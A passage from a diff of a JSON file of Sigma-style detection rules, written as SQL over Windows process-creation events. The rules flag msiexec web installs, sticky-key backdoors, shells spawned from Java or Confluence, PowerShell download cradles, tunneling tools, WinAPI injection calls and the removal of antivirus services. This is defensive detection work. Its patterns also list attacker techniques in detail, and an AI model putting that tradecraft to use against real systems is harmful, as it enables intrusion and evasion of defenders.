ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msiexec_install_remote.yml" + "filename": "proc_creation_win_windows_terminal_susp_children.yml" }, { - "title": "MsiExec Web Install", - "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "title": "Suspicious PowerShell Invocation From Script Engines", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "status": "test", - "description": "Detects 
suspicious msiexec process starts with web addresses as parameter", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Microsoft Operations Manager (MOM)", + "Other scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msiexec_web_install.yml" + "filename": "proc_creation_win_powershell_script_engine_parent.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", + "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", + "status": "experimental", + "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "WSL (Windows Sub System For Linux)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_mstsc_remote_connection.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", - "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", + "status": "experimental", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, 
Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. 
log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "title": "AgentExecutor PowerShell Execution", + "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" - ], - "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_servu_susp_child_process.yml" - }, - { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", - "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use via Intune management. 
You exclude script paths and names to reduce FP rate" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_lolbin_agentexecutor.yml" }, { - "title": "Suspicious Runscripthelper.exe", - "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", - "status": "test", - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "author": "Victor Sergeev, oscd.community", + "title": "Application Removed Via Wmic.EXE", + "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "status": "experimental", + "description": "Uninstall an application with wmic", + "author": "frac113", "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_runscripthelper.yml" + "filename": "proc_creation_win_wmic_uninstall_application.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", 
- "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "status": "experimental", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Exfiltration and Tunneling Tools Execution", + "id": 
"c75309a3-59f8-4a8d-9c2c-4c927ad50555", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Execution of well known tools for data exfiltration and tunneling", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\socat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "status": 
"experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.execution", - "attack.t1106" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine 
LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Lolbin Ssh.exe Use As Proxy", - "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", - "status": "experimental", - "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", - "author": 
"frack113, Nasreddine Bencherchali", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "status": "test", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE 
'%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ssh.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "New Port Forwarding Rule Added Via Netsh.EXX", - "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "status": "test", - "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Use of Wfc.exe", + "id": 
"49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "status": "experimental", + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1127" ], "falsepositives": [ - "Legitimate administration activity", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + "Legitimate use by a software developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" ], - "filename": "proc_creation_win_netsh_port_forwarding.yml" + "filename": "proc_creation_win_lolbin_wfc.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": 
